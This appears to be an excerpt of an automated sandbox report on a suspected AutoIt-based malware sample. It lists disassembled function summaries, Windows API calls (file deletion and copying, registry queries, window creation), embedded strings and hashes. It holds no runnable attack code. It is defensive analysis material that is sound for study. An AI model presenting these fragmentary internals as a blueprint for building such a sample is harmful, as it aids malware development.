• Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Variable must be of type 'Object'.
                                    • API String ID: 0-109567571
                                    • Opcode ID: 0b74333053d4f21dcbe16ad5b5ec286fb4d758629ac80f2761528386c7a4d12c
                                    • Instruction ID: 1066ff02b769e9fb4025a811366d2b23cd19c3ab32db1e21f44ecbe52c943a6f
                                    • Opcode Fuzzy Hash: 0b74333053d4f21dcbe16ad5b5ec286fb4d758629ac80f2761528386c7a4d12c
                                    • Instruction Fuzzy Hash: DBA2AF75A00219CFCB24EF98C480AAEB7B2FF59314F248069E915EB352D775ED42CB91
                                    APIs
                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00890A5B
                                    • timeGetTime.WINMM ref: 00890D16
                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00890E53
                                    • Sleep.KERNEL32(0000000A), ref: 00890E61
                                    • LockWindowUpdate.USER32(00000000,?,?), ref: 00890EFA
                                    • DestroyWindow.USER32 ref: 00890F06
                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00890F20
                                    • Sleep.KERNEL32(0000000A,?,?), ref: 008C4E83
                                    • TranslateMessage.USER32(?), ref: 008C5C60
                                    • DispatchMessageW.USER32(?), ref: 008C5C6E
                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 008C5C82
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
• Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                    • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                    • API String ID: 4212290369-3242690629
                                    • Opcode ID: ddc8948992b838f99e43923c35f16f6bcdc03d92df4404a624145de1a7cde086
                                    • Instruction ID: 4b1c6c69562fb229c8851470338058dfbc276c788e638da1306389a7a1a9ef67
                                    • Opcode Fuzzy Hash: ddc8948992b838f99e43923c35f16f6bcdc03d92df4404a624145de1a7cde086
                                    • Instruction Fuzzy Hash: C4B28D70608745DFDB24EB28C894F6AB7F5FB85304F18491DE49AD72A1CB71E884DB82

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 008E8F5F: __time64.LIBCMT ref: 008E8F69
                                      • Part of subcall function 00884EE5: _fseek.LIBCMT ref: 00884EFD
                                    • __wsplitpath.LIBCMT ref: 008E9234
                                      • Part of subcall function 008A40FB: __wsplitpath_helper.LIBCMT ref: 008A413B
                                    • _wcscpy.LIBCMT ref: 008E9247
                                    • _wcscat.LIBCMT ref: 008E925A
                                    • __wsplitpath.LIBCMT ref: 008E927F
                                    • _wcscat.LIBCMT ref: 008E9295
                                    • _wcscat.LIBCMT ref: 008E92A8
                                      • Part of subcall function 008E8FA5: _memmove.LIBCMT ref: 008E8FDE
                                      • Part of subcall function 008E8FA5: _memmove.LIBCMT ref: 008E8FED
                                    • _wcscmp.LIBCMT ref: 008E91EF
                                      • Part of subcall function 008E9734: _wcscmp.LIBCMT ref: 008E9824
                                      • Part of subcall function 008E9734: _wcscmp.LIBCMT ref: 008E9837
                                    • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 008E9452
                                    • _wcsncpy.LIBCMT ref: 008E94C5
                                    • DeleteFileW.KERNEL32(?,?), ref: 008E94FB
                                    • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 008E9511
                                    • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 008E9522
                                    • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 008E9534
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
• Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                    • String ID:
                                    • API String ID: 1500180987-0
                                    • Opcode ID: 473c582a587f4378b6a4051813275c847a8091921f922e444a20c78211a3f992
                                    • Instruction ID: 4b8316a563407b49f1c8061d37685450f904ba7947af9c011fda9682811ec557
                                    • Opcode Fuzzy Hash: 473c582a587f4378b6a4051813275c847a8091921f922e444a20c78211a3f992
                                    • Instruction Fuzzy Hash: E3C13CB1D00219AADF21DF99CC85ADEB7BDFF96310F0040AAF609E7151EB709A448F65

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 00884706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,009452F8,?,008837AE,?), ref: 00884724
                                      • Part of subcall function 008A050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00887165), ref: 008A052D
                                    • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 008871A8
                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 008BE8C8
                                    • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 008BE909
                                    • RegCloseKey.ADVAPI32(?), ref: 008BE947
                                    • _wcscat.LIBCMT ref: 008BE9A0
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
• Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                    • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                    • API String ID: 2673923337-2727554177
                                    • Opcode ID: c9a9442e2bb3a594ef463b4471a63f190732a4deb6a7d3158f8ff71df8823be7
                                    • Instruction ID: 6e41bc42fa35b6657c288c071e5e801b1dff11cb0c5b84452cfbd35b2236e0cc
                                    • Opcode Fuzzy Hash: c9a9442e2bb3a594ef463b4471a63f190732a4deb6a7d3158f8ff71df8823be7
                                    • Instruction Fuzzy Hash: B3715BB5518301AED310EF29E851DABBBF8FF86310B50052EF465C72A1EBB19948DB53

                                    Control-flow Graph

                                    APIs
                                    • GetSysColorBrush.USER32(0000000F), ref: 00883A50
                                    • LoadCursorW.USER32(00000000,00007F00), ref: 00883A5F
                                    • LoadIconW.USER32(00000063), ref: 00883A76
                                    • LoadIconW.USER32(000000A4), ref: 00883A88
                                    • LoadIconW.USER32(000000A2), ref: 00883A9A
                                    • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00883AC0
                                    • RegisterClassExW.USER32(?), ref: 00883B16
                                      • Part of subcall function 00883041: GetSysColorBrush.USER32(0000000F), ref: 00883074
                                      • Part of subcall function 00883041: RegisterClassExW.USER32(00000030), ref: 0088309E
                                      • Part of subcall function 00883041: RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 008830AF
                                      • Part of subcall function 00883041: LoadIconW.USER32(000000A9), ref: 008830F2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
• Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Load$Icon$Register$BrushClassColor$ClipboardCursorFormatImage
                                    • String ID: #$0$AutoIt v3
                                    • API String ID: 2880975755-4155596026
                                    • Opcode ID: bd32b0f7ffd34e47e0fe70232161876fc4c605d3f6fe255c660e239430aee8fd
                                    • Instruction ID: cacfe3b3a33fda38b92169fcd8611ebf5b2e979550f472445f5b989857e01d82
                                    • Opcode Fuzzy Hash: bd32b0f7ffd34e47e0fe70232161876fc4c605d3f6fe255c660e239430aee8fd
                                    • Instruction Fuzzy Hash: 23213779928708AFEB21DFA4EC19F9D7BB4FB09711F01012AE510A62A2D3B55640AF85

                                    Control-flow Graph

                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                    • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                    • API String ID: 1825951767-3513169116
                                    • Opcode ID: caaf74eace35837b2c358d520a5f98fee59626306a2e66ace735cee4de00d34c
                                    • Instruction ID: 8ab1a83b04505b7ee6058d2fc9376944f0dea6db7caef457dc7088a8fc9938b3
                                    • Opcode Fuzzy Hash: caaf74eace35837b2c358d520a5f98fee59626306a2e66ace735cee4de00d34c
                                    • Instruction Fuzzy Hash: 12A16D7291021DABCB14FBA8DC51EEEB778FF15714F44042AE416E7192EF749A08CB62

                                    Control-flow Graph

                                    APIs
                                    • GetSysColorBrush.USER32(0000000F), ref: 00883074
                                    • RegisterClassExW.USER32(00000030), ref: 0088309E
                                    • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 008830AF
                                    • LoadIconW.USER32(000000A9), ref: 008830F2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Register$BrushClassClipboardColorFormatIconLoad
                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                    • API String ID: 975902462-1005189915
                                    • Opcode ID: 29dd30c7b3333d89dd7d3312f965dcc232bf51f7ce5f15406ac9c9f0cebc2653
                                    • Instruction ID: 0e52b13cd2c5a8864817e735c99d075fc18bda0fbf72e49ba82796ac23810c7b
                                    • Opcode Fuzzy Hash: 29dd30c7b3333d89dd7d3312f965dcc232bf51f7ce5f15406ac9c9f0cebc2653
                                    • Instruction Fuzzy Hash: D03145B5925209EFDB60CFE4E889AC9BBF4FB09310F10412AF590E62A1D7B50685DF91

                                    Control-flow Graph

                                    APIs
                                    • GetSysColorBrush.USER32(0000000F), ref: 00883074
                                    • RegisterClassExW.USER32(00000030), ref: 0088309E
                                    • RegisterClipboardFormatW.USER32(TaskbarCreated), ref: 008830AF
                                    • LoadIconW.USER32(000000A9), ref: 008830F2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Register$BrushClassClipboardColorFormatIconLoad
                                    • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                    • API String ID: 975902462-1005189915
                                    • Opcode ID: a9255330b131cd10c03d8ff0895ed28d9b11dd68e63d1ff694f4bf89059ca3b2
                                    • Instruction ID: 00975f1f979b2c31638a8f709d576ab8273f50f2a53b3d05fd37069e8b82a029
                                    • Opcode Fuzzy Hash: a9255330b131cd10c03d8ff0895ed28d9b11dd68e63d1ff694f4bf89059ca3b2
                                    • Instruction Fuzzy Hash: 2721F7B5925208AFDB10DFE4EC48B9DBBF4FB09700F01412AF510A62A1DBB14644AF91

                                    Control-flow Graph (rendered graph image omitted from this export)
                                    APIs
                                    • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 015F9265
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732693093.00000000015F8000.00000040.00000020.00020000.00000000.sdmp, Offset: 015F8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_15f8000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: CreateFile
                                    • String ID:
                                    • API String ID: 823142352-0
                                    • Opcode ID: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                    • Instruction ID: e8f31f88df10e87e490cc73a2eed4b1a74590f06fda4d2631aa2d1e9003e6e0d
                                    • Opcode Fuzzy Hash: eb584f4a57c68eb24893e8662cdde2a6850f072ba7aa360e4ef334368506de38
                                    • Instruction Fuzzy Hash: 0F51E675A50208FBEF20DFA4CC59FDE77B8BF88704F108958F60AEA1C0DA7496458B60

                                    Control-flow Graph (rendered graph image omitted from this export)
                                    APIs
                                    • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00883A03
                                    • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00883A24
                                    • ShowWindow.USER32(00000000,?,?), ref: 00883A38
                                    • ShowWindow.USER32(00000000,?,?), ref: 00883A41
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: Window$CreateShow
                                    • String ID: AutoIt v3$edit
                                    • API String ID: 1584632944-3779509399
                                    • Opcode ID: d94a07d8a0ca690f4292cd194d1246aafc6b8e235466bdf824457231dfc4b232
                                    • Instruction ID: fc30085b1451f23279213fd343615261cb12c3aa5020906dfd2e799457c52f9b
                                    • Opcode Fuzzy Hash: d94a07d8a0ca690f4292cd194d1246aafc6b8e235466bdf824457231dfc4b232
                                    • Instruction Fuzzy Hash: 1BF03A74665690BFEA3167A76C18E2B3E7DE7C7F50B02012AB910A21B1C2A10C00EAB0

                                    Control-flow Graph (rendered graph image omitted from this export)
                                    APIs
                                    • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 008BD3D7
                                      • Part of subcall function 00887BCC: _memmove.LIBCMT ref: 00887C06
                                    • _memset.LIBCMT ref: 008840FC
                                    • _wcscpy.LIBCMT ref: 00884150
                                    • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00884160
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                    • String ID: Line:
                                    • API String ID: 3942752672-1585850449
                                    • Opcode ID: da01ca5e688bafeb1cc74240157a442a024100bde181953a306c1ca1eafea671
                                    • Instruction ID: b36edd8ab939b980b9a28d1c4b60b0d92b2a29d4950c81c7078437adf8d3ca8b
                                    • Opcode Fuzzy Hash: da01ca5e688bafeb1cc74240157a442a024100bde181953a306c1ca1eafea671
                                    • Instruction Fuzzy Hash: 4931AF72018705ABD321FBA4DC45FDB77E8FB45314F20451AF595D21A2EB709648CB93

                                    Control-flow Graph (rendered graph image omitted from this export)
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                    • String ID:
                                    • API String ID: 1559183368-0
                                    • Opcode ID: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                    • Instruction ID: d17f0ece17541749cbd48c8492f7fad816560924eb2de1cc81cbe95baf942190
                                    • Opcode Fuzzy Hash: dfdd2df0ab245b9716d30a375d324e0946404ce6e082d96a71c3349c3dbc91e5
                                    • Instruction Fuzzy Hash: 1251D370E01B09DBEB248E69D8806AE77A2FF46334F248729F825D6AD1D770DDD08B45
                                    APIs
                                      • Part of subcall function 00884DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,009452F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00884E0F
                                    • _free.LIBCMT ref: 008BE263
                                    • _free.LIBCMT ref: 008BE2AA
                                      • Part of subcall function 00886A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00886BAD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: _free$CurrentDirectoryLibraryLoad
                                    • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                    • API String ID: 2861923089-1757145024
                                    • Opcode ID: b1b65f82109ea1c4abffa2fa5841c43c876d8f6653106518190809511abc1c62
                                    • Instruction ID: 3c74f3714d87e985ea68eaff0d881ca8f78ff520f4740bd0f7c64c94916341c0
                                    • Opcode Fuzzy Hash: b1b65f82109ea1c4abffa2fa5841c43c876d8f6653106518190809511abc1c62
                                    • Instruction Fuzzy Hash: F1916C71900219AFCF14EFA8CC919EEB7B8FF19314B10452AF816EB3A1DB70A915CB51
                                    APIs
                                      • Part of subcall function 015FABA0: Sleep.KERNELBASE(000001F4), ref: 015FABB1
                                    • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 015FADE6
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732693093.00000000015F8000.00000040.00000020.00020000.00000000.sdmp, Offset: 015F8000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_15f8000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: CreateFileSleep
                                    • String ID: 0RI4G67BEUE5NC0OMWU
                                    • API String ID: 2694422964-189564730
                                    • Opcode ID: 404d9d9eb2f3fb70be51a2f1de6209437cc48add8bc64239be5e36ce6234b11d
                                    • Instruction ID: 87db207608467a2597c3cd42a77bb83ff7f3e83b016973120ed58799aac13b0a
                                    • Opcode Fuzzy Hash: 404d9d9eb2f3fb70be51a2f1de6209437cc48add8bc64239be5e36ce6234b11d
                                    • Instruction Fuzzy Hash: 7A518031D04249DBEF11DBB4C854BEEBBB9AF58300F004599E248BB2C1D7B90B45CBA6
                                    APIs
                                    • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,008835A1,SwapMouseButtons,00000004,?), ref: 008835D4
                                    • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,008835A1,SwapMouseButtons,00000004,?,?,?,?,00882754), ref: 008835F5
                                    • RegCloseKey.KERNELBASE(00000000,?,?,008835A1,SwapMouseButtons,00000004,?,?,?,?,00882754), ref: 00883617
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1732158041.0000000000881000.00000040.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                    • Associated: 00000000.00000002.1732140271.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.0000000000934000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000093E000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.000000000094D000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732158041.00000000009D3000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732293645.00000000009D9000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1732308789.00000000009DA000.00000004.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_880000_7056ZCiFdE.jbxd
                                    Similarity
                                    • API ID: CloseOpenQueryValue
                                    • String ID: Control Panel\Mouse
                                    • API String ID: 3677997916-824357125
                                    • Opcode ID: 33f7347bde5489f20c00ca09925831944039847d0ece8a0980e93e4b4a669240
                                    • Instruction ID: fe0bb9443d7d22fa169642dea5373805f737febc28797ecf9303159ab993e237
                                    • Opcode Fuzzy Hash: 33f7347bde5489f20c00ca09925831944039847d0ece8a0980e93e4b4a669240
                                    • Instruction Fuzzy Hash: 12114871514208BFDB21DFA8DC409AEB7BCFF15B40F008469E805E7210E2719F40A760
                                    APIs
                                      • Part of subcall function 00884EE5: _fseek.LIBCMT ref: 00884EFD
                                      • Part of subcall function 008E9734: _wcscmp.LIBCMT ref: 008E9824
                                      • Part of subcall function 008E9734: _wcscmp.LIBCMT ref: 008E9837
                                    • _free.LIBCMT ref: 008E96A2
                                    • _free.LIBCMT ref: 008E96A9
                                    • _free.LIBCMT ref: 008E9714
                                      • Part of subcall function 008A2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,008A9A24), ref: 008A2D69
